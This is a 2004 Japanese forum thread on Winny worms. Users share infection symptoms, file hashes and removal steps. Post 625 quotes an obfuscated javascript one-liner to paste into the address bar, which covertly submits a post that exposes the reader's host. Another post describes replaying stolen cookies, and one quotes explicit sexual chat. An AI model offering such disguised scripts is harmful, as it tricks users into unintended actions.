・[私には好きな…]→感染源不明、同様亜種に[私はポート0…]もある
   感染者のPC内の.txt .doc .jpgをパック詰めして放流
   仙台キンタマの亜種らしい。
   女性名のスクリーンセーバ偽装ものが感染源との話もあるが、発動条件不明

・仙台キンタマが放流したSSを、(画像詰め合わせ)として放流するタイプ
   元祖仙台キンタマの時限発動ものかも知れない?
   元祖仙台は、コード解析まで至っていないので、この機能を持つかどうか不明

530 :[名無し]さん(bin+cue).rar:04/11/07 23:27:34 ID:S8sHNyIN
やべースレタイわけわからんようになってるやん(笑)

531 :[名無し]さん(bin+cue).rar:04/11/07 23:27:53 ID:THjT0VmL
構造解析とかやめたらはずかしいな

532 :[名無し]さん(bin+cue).rar:04/11/07 23:27:56 ID:IxML2QFu
>>519>>523
ハゲワラ
もう何のスレか想像出来ないYO

533 :[名無し]さん(bin+cue).rar:04/11/07 23:29:34 ID:BzpG2xq4
構造解析Part31は?

534 :[名無し]さん(bin+cue).rar:04/11/07 23:29:59 ID:THjT0VmL

「ウィルスを肴にイキがった中学生みたいな雑談」というのが
いちばん妥当だけどね。実際は。

535 :[名無し]さん(bin+cue).rar:04/11/07 23:30:04 ID:Sg1nqW00
Winnyウイルス学 その傾向と対策31

536 :[名無し]さん(bin+cue).rar:04/11/07 23:32:01 ID:BzpG2xq4
>>534
でも新種が出たときはちゃんと解析してくれる人もいるからねぇ。

537 :[名無し]さん(bin+cue).rar:04/11/07 23:32:27 ID:e6oasC3d
シンプルに
【解析】ニュイルス Part.31【捷報】

538 :[名無し]さん(bin+cue).rar:04/11/07 23:33:21 ID:hC44dJlC
>>518
使用中で名前を変更出来ないと出ると思うが、
あとタスクマネージャでマルチプロセス止める事は至難の業ではないか?

>デスクトップSSのアップロードは止まるが、レジストリエディタの上書き
>が治まらない場合がある。

レジストリエディタは一度メモ帳で上書きされたら、自動で治る事は無いし(従って駆除しても元には戻らない)
上記がレジストリだとしたら、書き換えはsvchost32.exeが行うのではないのか?

539 :[名無し]さん(bin+cue).rar:04/11/07 23:33:41 ID:UVTPQy9a
質問者がこないと新種の発見が難しいし、かといって既出の
ウイルスの事聞かれんのもな〜

540 :[名無し]さん(bin+cue).rar:04/11/07 23:33:53 ID:9FRTRoyC
>>533
大学の教科書の例題みたいだなぁ

Winnyを狙ったワーム・ウィルス解析 Part31
が適当だと思う。

541 :[名無し]さん(bin+cue).rar:04/11/07 23:33:53 ID:IxML2QFu
そうだね、構造解析なんて実態より偉そうだね。
一部の神は別にして。
「ニャームニュイルス雑談にょ」か

542 :609 :04/11/07 23:34:15 ID:kCpZhge0
>>518
マジでありがとうございました。
明日管理者権限使わせてもらって復元します。
感染日っていうのはsvchost32.exeの横にある日付で問題無いですよね?
余裕もってもうちょっと前まで戻しますが。

レジストリエディタの上書きってのは何か問題があるのでしょうか。
兎に角ありがとうございました。迷惑かけてスマソ(´・ω・`)




543 :[名無し]さん(bin+cue).rar:04/11/07 23:36:21 ID:BzpG2xq4
明日また来るな。


544 :[名無し]さん(bin+cue).rar:04/11/07 23:36:35 ID:E/SJ2qOc
【(・∀・)ニヤニヤ】ニィニャニョPart31【( ´,_ゝ`)プッ】

545 :[名無し]さん(bin+cue).rar:04/11/07 23:37:05 ID:Sg1nqW00
エロゲー落としてた奴は反省してエロビデオに路線変更しろ そうすりゃ安心

546 :[名無し]さん(bin+cue).rar:04/11/07 23:37:18 ID:S8sHNyIN
じゃー、無難に>>540で行きますか?

>>529特攻しようにも本体落ちてこねー

547 :[名無し]さん(bin+cue).rar:04/11/07 23:39:08 ID:hC44dJlC
>>538
色々と読み間違えてた・・・スマン無視して>>518

548 :[名無し]さん(bin+cue).rar:04/11/07 23:39:12 ID:e6oasC3d
>>546
いーや、ニュイルスは外せん

549 :[名無し]さん(bin+cue).rar:04/11/07 23:40:24 ID:riUBtazw
ニュイルスWinny支店part31

550 :609:04/11/07 23:41:05 ID:kCpZhge0
>>518
>>538氏のとおり名前の変更は出来ませんでした…

551 :[名無し]さん(bin+cue).rar:04/11/07 23:42:08 ID:s+cgqL65
>>529の女性名のスクリーンセーバ偽装ものが感染源との話もあるが、発動条件不明、にひっかかっちまった・・・
でもプログラムエラーが出たらしくてログ作成してます窓が出て、それをすぐさまキャンセルしたんだけど、
どこか感染したんだろうか?

552 :[名無し]さん(bin+cue).rar:04/11/07 23:42:56 ID:IxML2QFu
ニュイルスはいいね。
勝手な話だけどさ、新種の質問や状態の話は歓迎で
既出のはカンベンてとこだよね。
さてそれが「ニュイルス=新種ウイルス」で伝わればいいんだが。

553 :[名無し]さん(bin+cue).rar:04/11/07 23:43:19 ID:XATDGuhB
649 :602 :04/11/07 22:33:21 ID:y7+CCqft
602で質問したものなのですが、
>>608氏の指摘しているウイルスにかかってしまい、
ダウンロード板の該当スレでsystem32にあるsvchost32を消さないといけないらしいのですが、削除が出来ません。

プログラムを指定して実行の欄に打ち込むのを晒して頂けないでしょうか?
“ ”の位置とかが違うのか理由はよく分からないのですが、
いくら微調整して打ち込んでもむ
'del'が見つかりません。名前を正しく入力したかどうかを〜
と出て何もできません。

参考したサイトはhttp://www.geocities.jp/kemkzuenc/Antinny.htmlです

554 :[名無し]さん(bin+cue).rar:04/11/07 23:43:30 ID:Svi6lRTC
おまいら速いよ・・・少し落ち着け・・・な

情報スレとして機能してくれ('A`)

555 :[名無し]さん(bin+cue).rar:04/11/07 23:43:49 ID:VKzsKV61
あのあからさまなフォルダ偽装にかかるとは・・・
トリップなしのファイル詰め合わせは無視の方向で

556 :[名無し]さん(bin+cue).rar:04/11/07 23:44:36 ID:BzpG2xq4
ニュイルスってニュウ+ウィルスって意味だったのか。
ずっとニュース+ウィルスだと思ってた。

557 :[名無し]さん(bin+cue).rar:04/11/07 23:44:42 ID:UVTPQy9a
>>552
伝わらん、伝わらんw

558 :[名無し]さん(bin+cue).rar:04/11/07 23:45:28 ID:ZBs3iAjU
scrの亜種を間違って実行したかもしれないんだけど、
ファイル検索で、bugfixとかwnconfig.txtが検出されなければ平気?
あと、仮に感染しててもny関連のファイルとかには感染しないから
アドレス帳とかバックアップとって再インスコでOK?

559 :518:04/11/07 23:46:04 ID:TvIlhLEl
>>538
>使用中で名前を変更出来ないと出ると思うが

これは俺も最初そう思ったんだが、出来る。

>タスクマネージャでマルチプロセス止める事は至難の業ではないか?
svchost32.exeの名前を変えてから片方のプロセスを止めると、復活できなく
なるらしい。片方ずつ潰していけば完全に止められる。

>レジストリエディタは一度メモ帳で上書きされたら、自動で治る事は無い
これは言い方が悪かった。
svchost32.exeを消した後、本物のレジストリエディタで、メモ帳のレジストリエディタ
を上書きしても、またメモ帳で上書きされてしまうということ。


といっても、俺が検証したのはこ○ねこからを採取した仙台キンタマだから、
他の亜種では違う結果になるかも。

560 :[名無し]さん(bin+cue).rar:04/11/07 23:49:36 ID:S8sHNyIN
気がついたら500超えてる!はえぇー
で名前の意見まとめると
マジメな感じだが恥ずかしくないのでニュイルスいれるってことだよな?
「Winnyワム・ニュイルス解析」でどうよ?原点復帰てことで

561 :[名無し]さん(bin+cue).rar:04/11/07 23:51:26 ID:bD0OBxmA
おれもにゅいるすがいい

562 :[名無し]さん(bin+cue).rar:04/11/07 23:51:40 ID:riUBtazw
Winny芋虫・ブルース解析

563 :[名無し]さん(bin+cue).rar:04/11/07 23:52:24 ID:8jJQytWO
【新種を】Newirus【発見】


564 :[名無し]さん(bin+cue).rar:04/11/07 23:52:30 ID:t97WMKYb
んだ、>>540でいいや。

>>546
特攻するって、例の女性名スクリーンセーバ偽装ものか?
ファイルサイズで415232byte、作成日 11/3 20:25:44 のやつな
特攻すると、Windows\system32\netowork に何か作られる(パック詰め)ところ
までは事例があるんだが、そこからの放流プロセスが不明なのよね。

女性名スクリーンセーバものは 370〜390KBぐらいのファイルだから、
すぐ見つかると思う。ここんとこ、今までとは違うパターンのも流れ始めたが
捏造物も見かけるようになってきた。

Cookieを流すタイプなので、これを自分のマシンのIEキャッシュに置いて、
同じユーザー名/IDで、該当サイトにログインすると…結構えげつないな。

565 :[名無し]さん(bin+cue).rar:04/11/07 23:52:49 ID:BzpG2xq4
じゃあ560を採用で行きます?
あんまり長引かせて情報が流れると困る人いそうだし。

566 :[名無し]さん(bin+cue).rar:04/11/07 23:53:32 ID:i1T7z8mB
ワームやウィルスで困ってる人間が、あせってスレタイ検索しても
引っかからないようなタイトルつけるんじゃねーよ、馬鹿


567 :[名無し]さん(bin+cue).rar:04/11/07 23:53:34 ID:46SsnBPq
[仙台ギャラクシーエンジェルズ]ニュイルス[俺のデスクトップ]

568 :[名無し]さん(bin+cue).rar:04/11/07 23:53:45 ID:hC44dJlC
>>559
色々と勘違いして変な言い方をしてしまって本当にスマン、んでまた突っ込むが

>これは俺も最初そう思ったんだが、出来る。

これがあのアフォの一番聞きたい事だろうな

>svchost32.exeを消した後、本物のレジストリエディタで、メモ帳のレジストリエディタ
>を上書きしても、またメモ帳で上書きされてしまうということ。

って事はまだ他にもプロセスが残ってるつう事で良いのか(setup.exe,ごみ箱.exe,他?)

569 :[名無し]さん(bin+cue).rar:04/11/07 23:53:53 ID:ZBs3iAjU
ゆいるすみたいで嫌だ

570 :[名無し]さん(bin+cue).rar:04/11/07 23:57:12 ID:b97gWzEA
アンニュイみたいで嫌だ

571 :[名無し]さん(bin+cue).rar:04/11/07 23:57:22 ID:e6oasC3d
>>566
ワームやウィルスで踏んだヌケ作が、あせってスレタイ検索しても
引っかからないようなタイトルにしてんだよ、ヴォケ


572 :[名無し]さん(bin+cue).rar:04/11/07 23:57:28 ID:BzpG2xq4
じゃあ1でひたすらテンプレ嫁!
初心者の質問スレじゃない!を強調する?

573 :[名無し]さん(bin+cue).rar:04/11/07 23:57:33 ID:VKzsKV61
にゅるぽ

574 :[名無し]さん(bin+cue).rar:04/11/07 23:58:20 ID:Sg1nqW00
>>573
ギャッ

575 :[名無し]さん(bin+cue).rar:04/11/07 23:58:33 ID:BzpG2xq4
>>573
ニャッ!

576 :[名無し]さん(bin+cue).rar:04/11/07 23:59:46 ID:EU5LYr8n
>>571
つまみがなくなる・・・。
情報交換だけなんて会議みたいのはいやだ

577 :[名無し]さん(bin+cue).rar:04/11/08 00:00:58 ID:+LnHNdAY
もう何でもいいや・・・

578 :[名無し]さん(bin+cue).rar:04/11/08 00:01:15 ID:PAcf6WX8
闇金みたいにさ、助ける振りしてさらに泥沼に引きずり込むように誘導すべし

579 :[名無し]さん(bin+cue).rar:04/11/08 00:02:01 ID:MpjlIIAl
やっちまったダブルクリック31

580 :[名無し]さん(bin+cue).rar:04/11/08 00:02:14 ID:vDHPOgXH
ウィニー+ウィルス=ウィニルス

【報連相】ウィニルス part31

581 :[名無し]さん(bin+cue).rar:04/11/08 00:02:19 ID:KQHb9Qsa
1でひたすら強調するかーそれも手だねー
スレタイは決まらんから
今のままでウイスルだけニュイスルにする方向で行こう
あと警告外して

582 :[名無し]さん(bin+cue).rar:04/11/08 00:06:31 ID:+LnHNdAY
【テンプレ読まなきゃニヤニヤされます】Winnyを狙ったワーム・ウイルス情報 Part31


583 ::[名無し]さん(bin+cue).rar :04/11/08 00:08:24 ID:hLoo53bR
>>582
それいい!

584 :[名無し]さん(bin+cue).rar:04/11/08 00:09:38 ID:zFLaVicF
.src偽装のウイルスに関する情報が少ないですね。
自分も誤って踏んでしまったのですが、再インスコするかどうか考え中。。
とりあえずこのスレと前スレ情報は熟読して怪しいファイルを探したが皆無。
UPフォルダもupfolder.txtの生成もなし。
とりあえず現時点でwinnyで個人情報がばら撒かれる心配はなさそうです。
ただしなんらかの時限爆弾があるかも知れない点が心配。

ちなみに自分の場合、.srcをダブルクリックしたものの、
なんだか実行できないと言うメッセージ(詳細忘れた)が出て途中で止まり、
タスクマネージャで強制終了しました。結局発動しなかったのかもしれません。

クリックしたけど発動しなかったぽいという人はほかにも何人かいましたね。

585 :[名無し]さん(bin+cue).rar:04/11/08 00:13:13 ID:5u1+wh7r
【警報】Winnyワーム・ウイルス情報&解析 Part31

変更ならこんなとこが無難だと思うけど、
どうせスレタイ変えたところで>>1嫁で終わるヨカーン。





586 :518:04/11/08 00:16:57 ID:qrAfS1ac
>>578
も一回やってみたが、svchost32.exeの名前変更は可能だった。
(svchost32.exeのプロセスが存在する状態でsystem32フォルダ内の
svchost32.exeの名前を変更)

レジストリエディタの方はWindowsの仕様かな?本物のレジストリエディタ
を他のexeで上書きしても、すぐに本物のレジストリエディタで上書きされてしまう。

仮想PC含む3台のPCでやったが、どれも同じ結果だった。(全てWinXP)
俺の環境の問題なのかワーム側の種類の違いかは分からんが。

>>550,>>578
いい加減な事言ってスマソ。

587 :[名無し]さん(bin+cue).rar:04/11/08 00:18:02 ID:Ttrw2Z/D
>>584
特攻したら先生に全力で制止された。

588 :518:04/11/08 00:18:38 ID:qrAfS1ac
間違ったorz

>>578
>>568=○

589 :[名無し]さん(bin+cue).rar:04/11/08 00:20:53 ID:D1+ybubt
http://gb.bbs.ws/book.php?book=pop
http://anitou.honesto.net/up/1/img-box/img20040902074841.html
http://qma2ch.hp.infoseek.co.jp/cgi-bin/img-box/img20040614030433.jpg
http://www.google.co.jp/search?hl=ja&btnI=I%27m+Feeling+Lucky&lr=lang_ja&q=sahra1354
http://strangeworld-honten.com/cgi-bin/bbs.cgi

このウイルスにやられてしまったのですが対処法がいまいち分かりません。
分かる方教えてください。

590 :[名無し]さん(bin+cue).rar:04/11/08 00:21:50 ID:j7miSBq6
直リンかよ

591 :[名無し]さん(bin+cue).rar:04/11/08 00:22:02 ID:MpjlIIAl
ぁゃιぃ

592 :[名無し]さん(bin+cue).rar:04/11/08 00:22:45 ID:S2bkaon/
>>584
お前FajhENk7だろ。まだ居るのかよ。
とっととOS再インスコしろ。

593 :[名無し]さん(bin+cue).rar:04/11/08 00:25:20 ID:qrAfS1ac
>>589
先生の仕事増やすなボケ!

594 :[名無し]さん(bin+cue).rar:04/11/08 00:25:25 ID:KQHb9Qsa
今日は寝とくはー乙マタ夜に

595 :[名無し]さん(bin+cue).rar:04/11/08 00:25:59 ID:J8KzxacR
>>589=荒らしケテーイ


596 :[名無し]さん(bin+cue).rar:04/11/08 00:27:31 ID:C2GWcfaY
>>584
Windows\System32以下に\networkができていないか?その中に、パック詰めが入っていないか要チェック
.src偽装ものが[私…]の実体だとしたら、HDDサーチして、.jpe.doc.xls.txtを探してパックするのに
相当な負荷がかかるはず

>>587
.scr偽装の.exeという時点で先生が警告するのかな? ファイルそのものだと先生は警告しないし

家具屋のアレも落ちてきた。確かに、こりゃ酷ぇ

597 :[名無し]さん(bin+cue).rar:04/11/08 00:34:21 ID:GYaE8xbd
ところでさ、System32ってadmin権限無しでいじれるのか?
質問君は管理者権限がどーのとか書いてなかったか?

598 :584:04/11/08 00:44:25 ID:zFLaVicF
>>596
Windows\System32以下に\networkはありません。
負荷も通常通りなのでとりあえず様子見です。
nyは当分やめておきますがね。

599 :[名無し]さん(bin+cue).rar:04/11/08 00:45:38 ID:e6pOot5x
スレタイ変えてもどうせ厨はやってくるんだから、ひたすら罵倒するか無視すりゃいいって。

600 :[名無し]さん(bin+cue).rar:04/11/08 00:46:58 ID:TO+u7SZa
誰も答えないけど質問スレを立てればいいと思う


601 :[名無し]さん(bin+cue).rar:04/11/08 00:47:09 ID:PAcf6WX8
家具屋のサイトに掲示板が無いのが悔やまれるね
フォームやメアドに特攻した勇者いるのかね

602 :[名無し]さん(bin+cue).rar:04/11/08 00:52:13 ID:5u1+wh7r
>>600
仙台は下に隔離誘導すればいいんじゃない?w

【仙台ギャラクシーエンジェルズ】Winny新ウィルス
http://tmp4.2ch.net/test/read.cgi/download/1099799904/l50

603 :[名無し]さん(bin+cue).rar:04/11/08 00:58:43 ID:TO+u7SZa
>>602
すでに逆誘導されてるんですけどw
本部にされてるw

604 :[名無し]さん(bin+cue).rar:04/11/08 01:00:59 ID:+OHgD4kU
関係ないけど仙台市民なのでなんか見るたびに複雑な気持ちになる。

605 :[名無し]さん(bin+cue).rar:04/11/08 01:02:43 ID:5u1+wh7r
>>603
知ってるけどねw

新ウイルスでお祭りになったら、
ここは情報解析だけで、祭り・質問は個別スレでして欲しい。
じゃないと余計な話挟まって有益な情報流しかねない。

そんなわけでループな話はあちらでして欲しい。

606 :[名無し]さん(bin+cue).rar:04/11/08 01:05:55 ID:Jdsh0RKV
>>605
まあそうなんだけど、この板で秩序を求めても空しいだけだ

607 :[名無し]さん(bin+cue).rar:04/11/08 01:19:54 ID:HxspJfJ3
お前らのやってるのは情報解析じゃなくって
情報収集だけですから


残念!


ニュイルス斬り

608 :[名無し]さん(bin+cue).rar:04/11/08 01:22:16 ID:6+PjKm54
SCRには動作パターンが複数ある模様。

自分で確認したのは、
・ディスク上から.txtなどを収集してアーカイブ
・仙台ギャラクシーっぽいZIPファイルの中身を再アーカイブ(ハッシュ値を変えるため?)
・何もしない(多重感染防止?)
の3パターン。
しつこく実行してたら、何もしなくなった。



609 :[名無し]さん(bin+cue).rar:04/11/08 01:23:12 ID:G07ZgRd4
いきなりがだ、まぁアレだ。感染した可能性がある(=そういう感じがした/身の覚えがある)やつはまだマシだ。
ノートン先生でもタスクマネージャでもレジストリでもシステムディレクトリでもどれ見ても
感染したような痕跡はないが、「こんだけのことやってて何故感染しないんだ」と
自暴自棄になってこのスレを隅々まで読みながらいつ感染するかガクブルしてるような
小心者の俺なんか重傷だべ。

・・・と、睡眠不足な自称上級者が愚痴をこぼしてみるてstil|li_| ̄|○il|li@ウィルス探索3日目

610 :[名無し]さん(bin+cue).rar:04/11/08 01:26:55 ID:5YARdbxe
>>609
俺もそんな感じ。SCR実行しちゃったっぽいんで
今サブマシンに必要なデータコピーして
明日にでも再セットアップしようかと思ってる。

611 :[名無し]さん(bin+cue).rar:04/11/08 01:53:24 ID:zFLaVicF
scr踏んだけどエラー?が出てウイルスは実行されなかった可能性が高いのですが
やはり再インスコするこにします。精神衛生上よくないので…
バックアップは取ったので週末にでもやってみます。

612 :[名無し]さん(bin+cue).rar:04/11/08 01:58:30 ID:FWHwYHNx
週末は終わったばかりだが・・・?
今度の週末まで放置ってことか?
ガンガレ!

613 :[名無し]さん(bin+cue).rar:04/11/08 02:19:32 ID:sudEVuJD
試しに[仙台ギャラクシーエンジェルズ] で始まるZIPファイルを落としてみたんだけど
膨大な量の個人情報が書かれたテキストファイルととscrだった。
scrはフォルダのアイコンで「マイドキュメント(空白).scr」でした。

614 :[名無し]さん(bin+cue).rar:04/11/08 02:21:10 ID:I3s2aDAw
その空白はバカ長いやつですか?                     srcみたいに

615 :[名無し]さん(bin+cue).rar:04/11/08 02:21:44 ID:sudEVuJD
>614
そうです

616 :[名無し]さん(bin+cue).rar:04/11/08 02:22:04 ID:I3s2aDAw
どもです

617 :[名無し]さん(bin+cue).rar:04/11/08 02:28:02 ID:EOshbTvs
仙台きんたまの現物を手に入れたいんだがどこにある?
とりあえず上の方で情報が出ているグリーングリーン2とかいうののイメージ落として
中身を見てみたが特に怪しいファイルやプログラムは見つからんかった。
仮想PC上で実行しようとしてるけど如何せん転送に時間がかかる、うーむ。

618 :[名無し]さん(bin+cue).rar:04/11/08 02:33:29 ID:I3s2aDAw
VMwareならわざわざ転送を行わなくても
メニューのVMからsettingを選らんで
CD-ROMのconnectionをuse physical driveで
ホストOSのdaemon toolsとかのバーチャルドライブ(グリーングリーン2のイメージをマウントしてるやつ)
を選択すれば転送する必要はないよ

619 :[名無し]さん(bin+cue).rar:04/11/08 02:45:38 ID:C2GWcfaY
>>613
それって、陽子〜とかだよな、名前とメルアドと住所(やたらでかいtxtファイル)
ほかの女性名の詰め合わせ(scr入り)は、"個人情報"という文字だけが並んでる数KBのTXT付き
だから、本当に個人情報が入ってるのは捏造じゃないかと考えられる

>>617
元祖仙台キンタマは、「こんねこ」とかいうエロゲのcon_setup.exeだっけ?
入手済みなのは2本ある、104960bytes(10/29)と108032bytes(10/30)


620 :617:04/11/08 03:21:13 ID:EOshbTvs
やっぱフリーじゃなくて、ちゃんとしたエミュレータが必要かな
でもVMWare高いしな(割れろってか?そりゃないぜ)
ま、とりあえず評価版使ってこんねこの方を試してみる。
情報サンクス

621 :[名無し]さん(bin+cue).rar:04/11/08 04:10:15 ID:22XBFXnv
>>620
ダウソ板にいて何故そんな発言

622 :[名無し]さん(bin+cue).rar:04/11/08 04:15:16 ID:/tNGS9z9
なぁ、お前らならもうとっくに知ってると思うけど
ShareでもNyでもない新手?のダウンロードソフトって何??

ヤフオクで販売してるんだけど、そのソフトウェアのウィンドウっぽいのが
載ってたけど見たことない・・・

http://page11.auctions.yahoo.co.jp/jp/auction/n9767700

NyとShare位は知ってたがこれは知らない・・
DLスレでもあまり無いような気がするんだけど、
知ってる人是非教えてくれ〜
最近、雑誌とか全然見ないから波に乗り遅れてるよ・・・

623 :[名無し]さん(bin+cue).rar:04/11/08 04:16:58 ID:IpZjqFCU
>>621
ダウソ板にいるからって割れにどっぷり漬かりきったクズばかりではない

624 :[名無し]さん(bin+cue).rar:04/11/08 04:20:10 ID:JWVHAdQR
買ったらお前でもわかるんじゃね?

625 :[名無し]さん(bin+cue).rar:04/11/08 04:46:57 ID:OYmTHBSX
http://tmp4.2ch.net/test/read.cgi/download/1099660337/165
165 :[名無し]さん(bin+cue).rar :04/11/08 04:14:08 ID:yyXSggKu
2ch専用ブラウザを使用している人は、
IEなどの一般的なブラウザでこのスレを開いておく。

1、
javascript:s='7769746828646f63756d656e742e666f726d735b305d297b46524
f4d2e76616c75653d2766757369616e6173616e273b4d4553534147452e7661
6c75653d275c75353134345c75386362345c75373533625c75353063665c
75333034665c75333036305c75333035355c7533303434273b7375626d697
42e636c69636b28293b7d';for(l=0,e="";l<s.length;l+=2)e+='%'+s.substr(l,2);eval(unescape(e));
をクリップボードにコピーし、メモ帳などのテキストエディタに貼り付ける。

2、
改行を外して1行にする。

3、
1行にしたものをクリップボードにコピーし、アドレスバーに貼り付ける。

4、
Enterを押す(もしくは「移動」をクリックする)。

俺はこれをやって思わず笑ってしまったよww

626 :[名無し]さん(bin+cue).rar:04/11/08 04:48:36 ID:W6qEs6dl
[私には好きな人がいます]は極悪だな。
HDD内のtxt、doc、xls、全部さらって行くぞ。

627 :[名無し]さん(bin+cue).rar:04/11/08 05:04:40 ID:LJwuPcAq
>>623
禿同。


628 :[名無し]さん(bin+cue).rar:04/11/08 05:10:50 ID:C2GWcfaY
>>626
あと、恥ずかしい.jpgもな。踏んだ兆候があったら情報くれ
(というか、流れてる件数は少ないから、危険ではあるが)
txtとしてCookie全部さらわれるのも、痛いと思うよ。

初代キンタマの直後の改変キンタマにも、そんな機能があったんだよな
そういえば、今度のは徹底的にさらっていくが。

629 :[名無し]さん(bin+cue).rar:04/11/08 05:24:29 ID:DOzjOVgz
>>619
こ○ねこで二種類あったか。それはしらなんだ………ちょっとまて。
10/29 104960 CRC32:F20CEC2Bはこ○ねこじゃなくてグ○グリ2だぞ。


で、藻前らにエサなんだが、shareで出ている?メルポがnyに輸入されて
いるらしいな。地引いていたmellpoが落ちてきた。

630 :[名無し]さん(bin+cue).rar:04/11/08 05:31:53 ID:6+PjKm54
SCRはエラーのダイアログがでてすぐに終了するように見えるが、
タスクマネージャを見ると、文字化けした名前のプロセスが動いてるぞ。

631 :[名無し]さん(bin+cue).rar:04/11/08 06:02:43 ID:cn5+rNFY
こういう方法思いついた奴は天才だな

632 :[名無し]さん(bin+cue).rar:04/11/08 06:40:22 ID:zgqNbjy8
おっさんのデジカメ写真は
非常につまらん。

633 :[名無し]さん(bin+cue).rar:04/11/08 06:41:34 ID:22XBFXnv
どっぷり漬かりらんくても必要な物ぐらい落とせばいいじゃん。
少しでも違法なもん落としてんなら全部クズだろ。

634 :[名無し]さん(bin+cue).rar:04/11/08 06:54:41 ID:aHB4bSO9
盗んだバイクを「かっこいいだろ」って自慢するようなもんだ。
あ、落としたVMのことね。

635 :[名無し]さん(bin+cue).rar:04/11/08 07:15:54 ID:JrafrNR4
ぐりぐり2でも仙台GA感染しました
TBTBにてCRC算出
Name CRC32 Bytes
----------- -------- -------
AUTORUN.EXE F20CEC2B 104,960
------------------------------
Total 1 Files 104,960 Bytes
です。
まあ、Virtual PC で試したので実害はなしですがね

636 :[名無し]さん(bin+cue).rar:04/11/08 07:39:05 ID:PAcf6WX8
エロゲもアプリも単なるデータ
VMだけが特別だなんてアホはカエレ

637 :[名無し]さん(bin+cue).rar:04/11/08 07:55:02 ID:JrafrNR4
お前が(・∀・)カエレ!!

638 :[名無し]さん(bin+cue).rar:04/11/08 08:02:48 ID:GYaE8xbd
不用意にageる香具師も(・∀・)カエレ!!

639 :[名無し]さん(bin+cue).rar:04/11/08 09:36:30 ID:JSFFFbFB
>>622
生石灰じゃん。

640 :[名無し]さん(bin+cue).rar:04/11/08 09:41:04 ID:JTz0FW1A
うはww仙台ギャラクシーエンジェルズで登録したら落ちてきまくりんぐwwww

641 :[名無し]さん(bin+cue).rar:04/11/08 10:03:59 ID:PAcf6WX8
Y井君よ、ウイルスセキュリティじゃ見つからないよ、先生にしましょうね

642 :[名無し]さん(bin+cue).rar:04/11/08 10:05:11 ID:wxEZgyjt
>>622
Limewire。
http://www.limewire.com/japanese/content/home.shtml
グヌテラ一派、Javaで書かれ、主にマカーが使用

643 :[名無し]さん(bin+cue).rar:04/11/08 10:07:06 ID:wxEZgyjt
追記
グヌテラなんで、落とす側も落とされる側も生IP丸出し
後、米でロリ一斉摘発の対象になったソフト

結論、最先端どころか時代遅れもいいとこ

644 :[名無し]さん(bin+cue).rar:04/11/08 10:38:13 ID:4DA/e9rp
感染者のデスクトップ画像やWinnyの「戦果」、さらにはメールの内容などをWinnyに
アップロードするトロイの木馬が発見された。
 11月初め、「[仙台ギャラクシーエンジェルズ] [俺のデスクトップ]」という共有名で、
デスクトップ画像などを、P2P型ファイル共有ソフトウェア「Winny」にアップロードする
トロイの木馬が発見された。

 感染者数はWinnyで判定する限り70名以上。今回はより深いプライバシーを漏洩する
タイプであるため、身に覚えのある人は早急にウイルススキャンを行う必要があるだろう。
なお、ITmediaから記事作成開始と同時にアンチウイルスベンダー各社に検体を提供しており、
対応パターンは順次提供されているようだ。

「お気に入り」と「メール」まで漏洩
 このトロイの木馬の動作には不明なところも多い。完全に判明しているわけではないが、
把握している限りでは以下のような挙動を示すようだ。番号ごとに動作の可能性は
減っていくと推測される。

ソース元: ITmedia
http://www.itmedia.co.jp/enterprise/articles/0411/05/news089.html


645 :[名無し]さん(bin+cue).rar:04/11/08 10:45:39 ID:mtCVPz7W
今更そんな記事

646 :[名無し]さん(bin+cue).rar:04/11/08 10:58:17 ID:X7Rn4uTH
何が恐いって、感染した奴が
違法、エロ、オタ、2ちゃんなど
致命的な趣味嗜好を併せ持つのが
全部ばれてしまうことか…
もう止めるかな。

647 :[名無し]さん(bin+cue).rar:04/11/08 11:00:44 ID:GNB/q3S3
あんまり解り難いスレタイを付けられると、本格的にスレが寂びれ、重複スレが立つ危険がある。

それに、アホの妄言は脳内あぼーん推奨というのも大前提としてあるのを忘れてはいかんぞ。

648 :[名無し]さん(bin+cue).rar:04/11/08 11:03:25 ID:wxEZgyjt
正体不明な奴は、VPC上で走らせて確認、は、最低限の常識
万が一感染しても、仮想イメージで保存しておいたVPCを入れ替えで済むし

たったこれだけすらしな、面倒臭い事が嫌いな奴は自爆して当たり前
努力で回避出来る事すらしない奴は、辞めるべきだね

649 :209:04/11/08 11:03:27 ID:B3s8nOB8
昨日の夜からの過程を一生懸命文章で書いてたんだが
作文力の無さに泣きそうになったんで形式変えますた。

色々頑張る→svchost32をリブートソフトとかいうので再起動時に消す
→暫く待ってもupフォルダに画面のアップは無かった

→but コマンドを指定して実行で「regedit」と入力する→メモ帳が出る
→治す(上書き)方法を調べるも分からず
→「システムの復元」というコマンドで一週間くらい前に戻す
→regiditと入力するとちゃんと?レジストリエディタが出る
+system32の中のsvchost32も以前消えたまま
→winnyのフォルダごと削除
→画面のアップは無し(というかupフォルダが作られていた大本のフォルダがもう無い)

補足
Ctrl+Alt+Delでタスクマネージャを起動して
プロセスタブを見るとsvchost32は無いもののsvchostは五つほどありました。

これで解決でFAで良いでしょうか?
まだ不安な点とか、最後の点検だけでもお助け下さい(´Д

650 :[名無し]さん(bin+cue).rar:04/11/08 11:04:29 ID:wxEZgyjt
>>647

( ゚д゚)ポカーン

651 :209:04/11/08 11:15:35 ID:B3s8nOB8
>>650
ポカーンついでに>>649頼んます(´Д

652 :[名無し]さん(bin+cue).rar:04/11/08 11:19:23 ID:wxEZgyjt
>>651

((((;゚Д゚)))ガクガクガクブルブルブル












svchostは気にしなくていいよ、健全なシステムで常時稼働している物

653 :[名無し]さん(bin+cue).rar:04/11/08 11:37:35 ID:fTT181VB
>>649
偽名で動いてる場合もあるが、だとしたら既に手遅れだし。
実行ファイルの作成日や変更日も簡単に偽証できる。

つか、なんで初期化しないの?
ちょっとでも停めると業務に支障が出るようなマシンなのか?

654 :[名無し]さん(bin+cue).rar:04/11/08 11:57:13 ID:GDKI1BnI
>>648
仮想OSでテストしても、症状が具体的に出にくいウィルスだと危険だよ
今回の「私には、、」とか「ポート0、、」とかも発症条件があるみたいだし

655 :[名無し]さん(bin+cue).rar:04/11/08 12:41:06 ID:VVg1Kzm2
>>649
感染源は何だった?

656 :[名無し]さん(bin+cue).rar:04/11/08 13:55:06 ID:JCoZww6B
nao: あのね
きらり: はい
nao: 変態だって思わないでほしいんだけど
きらり: うん
nao: もしオマンコの穴が痛いんだったら
きらり: うん
nao: お尻を試してごらん

657 :[名無し]さん(bin+cue).rar:04/11/08 14:06:06 ID:dhfVxqAA

今となっては懐かしいフレーズだな。


658 :[名無し]さん(bin+cue).rar:04/11/08 14:17:37 ID:cvTW0Rup
